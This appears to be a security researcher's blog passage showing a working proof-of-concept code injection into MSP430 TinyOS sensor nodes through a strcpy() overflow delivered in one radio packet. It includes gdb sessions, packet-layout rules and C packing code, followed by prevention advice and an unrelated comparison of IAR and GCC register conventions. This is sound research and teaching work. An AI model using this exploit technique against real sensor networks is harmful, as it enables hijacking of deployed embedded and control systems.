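The infinite loops in these payloads come from the MSP430's PC-relative JMP, whose 10-bit signed offset counts words from the address following the jump. As a sketch (encode_jmp() is a hypothetical helper), the word can be computed from the byte displacement relative to the jump itself, gdb's "$+disp" notation. This reproduces both 0x3fff, a jump to itself, and the 0x3ffd that loops back over a four-byte XOR in the complete exploit.

```c
#include <assert.h>
#include <stdint.h>

/* Encode an unconditional MSP430 JMP. The target is
 * jmp_addr + 2 + 2*offset, where offset is a 10-bit signed word count.
 * disp is the byte displacement from the JMP instruction itself. */
uint16_t encode_jmp(int disp)
{
    assert(disp % 2 == 0);            /* targets are word-aligned */
    int offset = (disp - 2) / 2;      /* words, relative to jmp_addr + 2 */
    assert(offset >= -512 && offset <= 511);
    return (uint16_t)(0x3c00 | ((unsigned)offset & 0x3ff));
}
```

encode_jmp(0) gives 0x3fff (while(1);) and encode_jmp(-4) gives 0x3ffd.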

Using a JTAG debugger (TI MSP-FET430PIF or TI MSP-FET430UIF), it's trivial to view the stack. You'll notice that the stack is rather shallow, only two functions deep. As 'BlinkC$Timer0$fired' is called without stack parameters (those that don't fit into registers), a simple RET suffices to return past it. If parameters were on the stack, they could be removed with the POP instruction.

(gdb) break 'BlinkC$setled'
Breakpoint 1 at 0x4d46: file BlinkC.nc, line 99.
(gdb) continue
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
BlinkC$setled () at BlinkC.nc:99
(gdb) where
#0 BlinkC$setled () at BlinkC.nc:99
#1 0x00004d46 in BlinkC$Timer0$fired () at BlinkC.nc:128
#2 0x00004d46 in BlinkC$Timer0$fired () at BlinkC.nc:128
(gdb)


A Complete Exploit



Now that we've got machine code and a way to force it onto the stack, we are still left with the issue of knowing at which address it will be. On a workstation, desktop, or server, it's common practice to place a run of NOP instructions before the code you intend to execute, so that a jump landing anywhere in that run slides into the code and the target address need only be guessed approximately. On x86 processors, this is particularly easy because of support for a byte-length NOP instruction (0x90) and unaligned access.

Wireless sensor nodes and other embedded systems require a different strategy. The payload of a packet is often so small that a single packet has barely got room for anything interesting, much less a bunch of word-length NOP instructions (0x4303, which is really MOV r3,r3). Fortunately, these systems emphasize static allocation. malloc() and other heap allocation are strongly discouraged, to the point that much of the documentation claims malloc() doesn't exist.

A consequence of static allocation is that if twenty nodes run the same firmware, all twenty will have every non-stack variable at the same address. This includes the functions that handle an incoming packet and the global buffer that holds it. Thus, the easiest way to inject code into a live wireless sensor node with a single 802.15.4 packet is to craft a packet which, when copied over the stack, overwrites the return address with the address of the global copy of itself, not the stack's copy.

Executing the stack's copy is also possible, of course.

Target Application



For an example of a remote exploit, I threw together a simple application that accepts the shortened name of a color--RED, GREN, or BLUE--within a packet and enables the appropriate LED. The code is below:


void __attribute__ ((noinline))
docmd(radio_count_msg_t* rcm){

  char cmd[6];
  strcpy(cmd,rcm->cmd);


  if(!strcmp(cmd,"RED"))
    call Leds.set(1);
  if(!strcmp(cmd,"GREN"))
    call Leds.set(2);
  if(!strcmp(cmd,"BLUE"))
    call Leds.set(4);
  return;
}

event message_t* Receive.receive(message_t* bufPtr,
                                 void* payload, uint8_t len) {
  char cmd[6];
  radio_count_msg_t* rcm = (radio_count_msg_t*)payload;
  docmd(rcm);

  return bufPtr;
}




The first step is to determine where the packet resides in memory on the victim. I suppose it's possible to dig around TinyOS for the symbol of the packet buffer, but since debugging symbols might not be available, a more reliable technique is to search memory for the contents of the last packet sent:
(gdb) x/s 0x2a2
0x2a2: "\006RED"
(gdb)


Trying again for a different packet, at the same address I find
(gdb) x/s 0x2a2
0x2a2: "\006BLUE"
(gdb)


And one last time for the green led, I find
(gdb) x/s 0x2a2
0x2a2: "\006GREN"
(gdb)


At each stage, the light matches the string being given. This gives me both good and bad news. The good news is that my packet gets through; the bad news is that it's misaligned. The "\006" character is at 0x2a2, which means that the packet's string doesn't begin until 0x2a3, an odd address. Machine code may only reside at even addresses on the MSP430 and many other processors, with the x86 being a notable exception.

Once the target address is known, crafting an attack is as simple as stuffing the following things into the packet:
1. The executable machine code, even-aligned in the global packet.
2. The entry address of the machine code, even-aligned in the overflow onto the stack, offset such that it overwrites the stored program counter.
3. A terminating null character or word, such that strcpy() or its equivalent doesn't hit flash ROM.

These rules can be quite a juggling act, but expressed for the above example:
1. Executable code should begin at the second letter of the enclosed string, which will be 0x02a4 on the target.
2. 0x02a4 (0xa4 0x02 as bytes) must reside in bytes 7 and 8 of the string.
3. The string must end in zeros.
4. The first letter must not be a zero.

While it's not terribly difficult to do these things on paper, it's cleaner to do it in C. First we define our machine code in an array, as we did before:

volatile int machlang[30]={
  //garbage, but with no zero bytes
  0xdead,
  0xbeef,

  //to be obliterated by the address and null terminator
  0x0f01,
  0x0f02,

  //to be executed
  0xe3b2, //inv &0x0031
  0x0031,
  0x3ffd, //jmp $-4 (back to the inv)
  0x0000,
};


This has a lot of empty space and doesn't contain as much information as it might. The machine code in the suffix just toggles the LEDs in an infinite while loop, though in practice they blink faster than the human eye can see. The following code packs the machine code and the target address into a single string for sending as a packet. Note that the address and the machine code are aligned differently. This is because the address must be even-aligned in the destination of the strcpy(), the stack buffer, while the machine code must be even-aligned in the source, the global copy of the packet.

void __attribute__ ((noinline))
build_exploit(void* vstr)
{
char *str=(char*)vstr;
//machlang has zeroes, so it may not be used before the address.
//load the machine code, with weird but correct offset.
memcpy(attack+1,&machlang,16);

//load the attack address
memcpy(attack+6,&attackinit,2);

attack[8]=0;//zero out end, just in case.
memcpy(str,attack,20);
}
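To see where each piece lands, the packing in build_exploit() can be replayed on a workstation. This is a sketch, not the code above: it assumes attack[] is a 20-byte buffer whose first byte is a non-zero filler and that attackinit holds the entry address 0x02a4. Because int is usually 32 bits on a workstation rather than 16 bits as on the MSP430, it serializes the words of machlang explicitly in little-endian order instead of memcpy()ing the array. The names pack_attack, machlang16 and PACKET_ADDR are hypothetical.

```c
#include <stdint.h>
#include <string.h>

#define PACKET_ADDR 0x02a3u   /* target address of the string's first byte */

/* First eight words of machlang, as in the listing above. */
static const uint16_t machlang16[8] = {
    0xdead, 0xbeef,           /* garbage */
    0x0f01, 0x0f02,           /* to be obliterated */
    0xe3b2, 0x0031,           /* to be executed */
    0x3ffd, 0x0000
};

/* Replays build_exploit(): code at +1, address at +6, terminator at +8. */
void pack_attack(uint8_t attack[20], uint16_t entry)
{
    int i;

    memset(attack, 0, 20);
    attack[0] = 'A';                          /* hypothetical non-zero first byte */
    for (i = 0; i < 8; i++) {                 /* 16 bytes, little-endian */
        attack[1 + 2 * i] = (uint8_t)(machlang16[i] & 0xff);
        attack[2 + 2 * i] = (uint8_t)(machlang16[i] >> 8);
    }
    attack[6] = (uint8_t)(entry & 0xff);      /* entry address, little-endian */
    attack[7] = (uint8_t)(entry >> 8);
    attack[8] = 0;                            /* strcpy() stops here */
}
```

The result shows both alignments: the address sits at offset 6 from the start of the strcpy() destination, while the "to be executed" words start at string index 9, which is address 0x02ac on the target and therefore even in the source.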



Prevention



Randomizing addresses would make these attacks more difficult to stage, particularly if every node ran a different build, so that no two nodes would store incoming packets at the same address. The compiler could also push an object of random size onto the stack, so that the stack's depth follows a sort of drunkard's walk and injected code on the stack can't be reliably jumped to.
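The drunkard's walk can be approximated by hand, without compiler support: allocate a randomly sized pad just before calling the routine that handles packets, so that its stack frame lands at a different depth on each call. A sketch under these assumptions: a C99 compiler with variable-length arrays, GCC's noinline attribute as used above, rand() standing in for a real entropy source, and a hypothetical handler that merely records where its buffer landed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Records where the handler's buffer landed on its most recent call. */
volatile uintptr_t last_buf_addr;

/* Hypothetical packet handler.  Its local buffer is where an overflow
   would begin, so its address is what the padding should vary. */
void __attribute__ ((noinline)) handle_packet(void)
{
    volatile char buf[16];

    buf[0] = 0;
    last_buf_addr = (uintptr_t)&buf[0];
}

/* Pick an even pad length of 2..64 bytes. */
size_t random_pad_len(void)
{
    return 2u * (1u + (size_t)(rand() % 32));
}

/* Call handle_packet() beneath a pad of pad_len bytes (pad_len >= 1).
   The compiler may round the pad up for alignment. */
uintptr_t __attribute__ ((noinline)) padded_call(size_t pad_len)
{
    volatile char pad[pad_len];      /* C99 variable-length array */

    pad[0] = 0;
    handle_packet();
    pad[pad_len - 1] = 0;            /* touch pad after the call so it stays live */
    return last_buf_addr;
}
```

A node would call padded_call(random_pad_len()) from its receive loop, so that an attacker can no longer count on the saved program counter sitting at a fixed offset.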

A still more effective alternative would be an addition to the MSP430 itself, one that would branch to an exception handler if the program counter ever left flash memory. This isn't a workstation, and there's rarely any reason to execute instructions from RAM. Thus, a simple configuration register that enabled or disabled execution from RAM would make the platform much more difficult to exploit.
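The proposed control is hypothetical, but the check such hardware would make on each instruction fetch is easy to model. In this sketch the flash bounds and the enable bit are placeholders, not real MSP430 registers:

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical configuration for the proposed fetch check. */
struct exec_policy {
    uint16_t flash_start;     /* lowest flash address */
    uint16_t flash_end;       /* highest flash address, inclusive */
    bool     ram_exec;        /* proposed bit: allow execution outside flash */
};

/* True if fetching an instruction at pc is allowed.  A false result is
   where the hardware would branch to an exception handler instead. */
bool fetch_allowed(const struct exec_policy *p, uint16_t pc)
{
    if (pc >= p->flash_start && pc <= p->flash_end)
        return true;
    return p->ram_exec;
}
```

With execution outside flash disabled, a return into the packet buffer at 0x02a4 would fault instead of running the injected code.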

As always, string functions that copy until they reach a null terminator, with no limit on length, should never be used. There are other mistakes that make the stack vulnerable to corruption, but this is by far the most common. strcpy() and its like should have been culled from the C language decades ago, but they're still with us and still being taught in introductory computer science classes.
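As a contrast to strcpy(), a receive path can carry the packet's length explicitly and refuse anything that does not fit. A minimal sketch; the function name and the choice to reject rather than truncate are assumptions:

```c
#include <stddef.h>
#include <string.h>

/* Copy len bytes of a received payload into dst, which holds dst_size
   bytes.  Unlike strcpy(), the amount copied never depends on where a
   zero byte happens to appear.  Returns 0 on success, -1 if too long. */
int copy_payload(char *dst, size_t dst_size, const char *src, size_t len)
{
    if (len >= dst_size)          /* leave room for a terminating zero */
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}
```

An oversized packet is simply dropped, so nothing beyond the buffer, and in particular no saved program counter, is ever overwritten.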

I gave an informal introduction to this code-injection technique at the 2007 ACS Control Systems Cyber Security Conference in Knoxville, Tennessee. By far the most common objections were that cryptography made this unexploitable in practice, or that the fence-line prevented malicious packets from reaching the target system.

Although it's true that cryptographically verifying received packets makes code injection more difficult, it does not make such injection impossible. Key management must follow a policy strict enough that a stolen node is de-authorized before an attacker can attach a JTAG cable and forcibly extract the key. Further, the JTAG fuse ought to be blown, so that the node must be taken off-site for firmware extraction.

Regarding the fence-line, it's just a line in the sand as far as an attacker is concerned. 2.4GHz amplifiers are rather easy to acquire, and the 150 meter range listed on the radio's spec sheet doesn't apply when an extra amplifier is attached. Even if we assume that the fence-line is effective, such as on a submarine, it's still possible to either bribe or trick an authorized employee into bringing a transmitter within the fence, or a packet sniffer in and then back out.

Thursday, August 2, 2007

On the IAR MSP430 C Compiler's Inefficient Register Utilization

Recently, I've been digging into the documentation of Texas Instruments' MSP430 microcontroller family. After covering the CPU itself, I continued into the documentation[1] for the mspgcc project, a port of GCC to the MSP430. After realizing that the ABI used by mspgcc isn't defined anywhere in the chip's documentation[3], I dug up the manual[2] for IAR's compiler and compared the two.

I quickly discovered that IAR's compiler wastes registers when passing 16-bit parameters to a C function. By its ABI, the first 16-bit parameter is placed into R12 and the second into R14. R13 and R15 remain unused, as they are reserved for the high words of 32-bit parameters. GCC follows the much more logical route of only assigning a single register to a 16-bit value, such that R15 is used for the first parameter, R14 for the second, R13 for the third, and R12 for the fourth. This allows it to accept four parameters by register, while IAR's compiler will push the third and fourth onto the stack while leaving two clobber registers unused!
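The two conventions, as described here for 16-bit arguments, can be written down as lookup functions. This sketch models only the rules stated above (IAR: R12, then R14, then the stack; mspgcc: R15 down to R12, then the stack) and ignores 32-bit arguments, structures, and variadic functions; the function names are hypothetical.

```c
/* Register number that receives the n-th (0-based) 16-bit argument,
   or -1 if the argument is passed on the stack. */
int iar_arg_reg(int n)
{
    static const int regs[] = { 12, 14 };   /* R13, R15 held for high words */
    return (n >= 0 && n < 2) ? regs[n] : -1;
}

int gcc_arg_reg(int n)
{
    return (n >= 0 && n < 4) ? 15 - n : -1; /* R15, R14, R13, R12 */
}

/* How many of nargs 16-bit arguments end up on the stack. */
int stacked_args(int (*conv)(int), int nargs)
{
    int n, count = 0;

    for (n = 0; n < nargs; n++)
        if (conv(n) < 0)
            count++;
    return count;
}
```

For a function of four 16-bit arguments, stacked_args(iar_arg_reg, 4) is 2 while stacked_args(gcc_arg_reg, 4) is 0.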


To demonstrate this, I compiled a simple C program containing only a function foo(), which returns the sum of its four inputs, and a main() function that calls foo(). This was compiled to assembly language using mspgcc 3.2.3 and IAR MSP430 C/C++ Compiler V3.42A/W32.
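The test program itself isn't reproduced here. Something along these lines would exercise both conventions; it is a reconstruction, not the original source, and call_foo() is a hypothetical stand-in for the main() described above.

```c
/* Sum of four arguments; int is 16 bits on the MSP430, so each
   argument occupies a single register or stack word. */
int foo(int a, int b, int c, int d)
{
    return a + b + c + d;
}

/* Stand-in for main(): one call with four arguments. */
int call_foo(void)
{
    return foo(1, 2, 3, 4);
}
```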

In both compilers, four assembly instructions were used: three ADD.W instructions sum the values into the register of the first parameter, R12 for IAR and R15 for GCC, and a RET returns with the result in that register. The table below lists the assembly generated by each compiler, with instructions converted from the GCC format (lowercase, .W omitted) to the IAR format for clear comparison. Thanks to its more efficient register usage, GCC avoids both pushing two parameters onto the stack with PUSH.W and using the indexed addressing mode, as in X(SP), within the function.





IAR Compiler                      GCC Compiler
foo:                              foo:
ADD.W R14, R12       //1c,1w      ADD.W R14, R15  //1c,1w
ADD.W 0x2(SP), R12   //3c,2w      ADD.W R13, R15  //1c,1w
ADD.W 0x4(SP), R12   //3c,2w      ADD.W R12, R15  //1c,1w
RET                               RET

(c = CPU cycles, w = 16-bit words of code)



Pages 3-72 and 3-73 of the MSP430 Family Guide[3] detail the full cost of these additions, which increase not only the runtime but also the storage requirements of the function. According to those pages, "ADD.W R14, R15" takes 1 cycle and 1 word of memory, while "ADD.W 0x2(SP), R12" takes 3 cycles and 2 words. Additionally, each of the two PUSH.W instructions required to call foo() with the IAR compiler takes 3 cycles, which GCC never has to spend.
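Adding up these per-instruction costs gives the difference directly. This sketch tallies the three ADD.W instructions of each foo() body using the cycle and word counts quoted above, leaves out RET since it is identical in both, and adds IAR's two PUSH.W instructions at the call site; the names are illustrative.

```c
/* Cost of one instruction: CPU cycles and 16-bit words of code. */
struct cost { int cycles; int words; };

/* The three ADD.W instructions of foo() under each compiler. */
static const struct cost iar_body[] = { {1, 1}, {3, 2}, {3, 2} };
static const struct cost gcc_body[] = { {1, 1}, {1, 1}, {1, 1} };

/* Cycles IAR spends pushing the third and fourth arguments: 2 x 3. */
enum { IAR_PUSH_CYCLES = 2 * 3 };

/* Sum the costs of n instructions. */
struct cost total(const struct cost *insns, int n)
{
    struct cost t = { 0, 0 };
    int i;

    for (i = 0; i < n; i++) {
        t.cycles += insns[i].cycles;
        t.words  += insns[i].words;
    }
    return t;
}
```

That comes to 7 cycles and 5 words for IAR against 3 cycles and 3 words for GCC, or 10 extra cycles per call once the pushes are counted, not including any call-site cleanup.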

Texas Instruments' Code Composer Essentials does not suffer from IAR's inefficiency; instead, it uses an ABI similar to, but incompatible with, GCC's. CCE allocates register R12 for the first parameter, then R13, R14, and R15, and returns the result in R12. GCC uses the registers in the opposite order and returns in R15. See the User's Guide[4] for more details.

What's the reasoning behind IAR's design? It makes functions of two 32-bit values easily compatible with those of two 16-bit values, but this compatibility breaks as soon as a third parameter comes into play, since it is pushed onto the stack as a single word. If such compatibility were essential, it could be preserved by using R13 for the third parameter and R15 for the fourth.
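The suggested compromise keeps IAR's placement for the first two 16-bit arguments and adds R13 and R15 for the third and fourth. This sketch of that hypothetical assignment sits alongside the low-word register IAR uses for each of the first two 32-bit arguments (R13:R12, then R15:R14), showing that the first two 16-bit arguments still line up with them:

```c
/* Hypothetical: register for the n-th 16-bit argument under the
   proposed scheme (R12, R14, R13, R15), or -1 for the stack. */
int proposed_arg_reg(int n)
{
    static const int regs[] = { 12, 14, 13, 15 };
    return (n >= 0 && n < 4) ? regs[n] : -1;
}

/* Low-word register of the n-th 32-bit argument under IAR's
   convention (R13:R12, then R15:R14), or -1 for the stack. */
int iar_long_low_reg(int n)
{
    static const int regs[] = { 12, 14 };
    return (n >= 0 && n < 2) ? regs[n] : -1;
}
```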

Sources:
[1] mspgcc manual
[2] IAR manuals
[3] Texas Instruments' MSP430 Family Guide
[4] MSP430 Optimizing C/C++ Compiler User's Guide (SLAU132)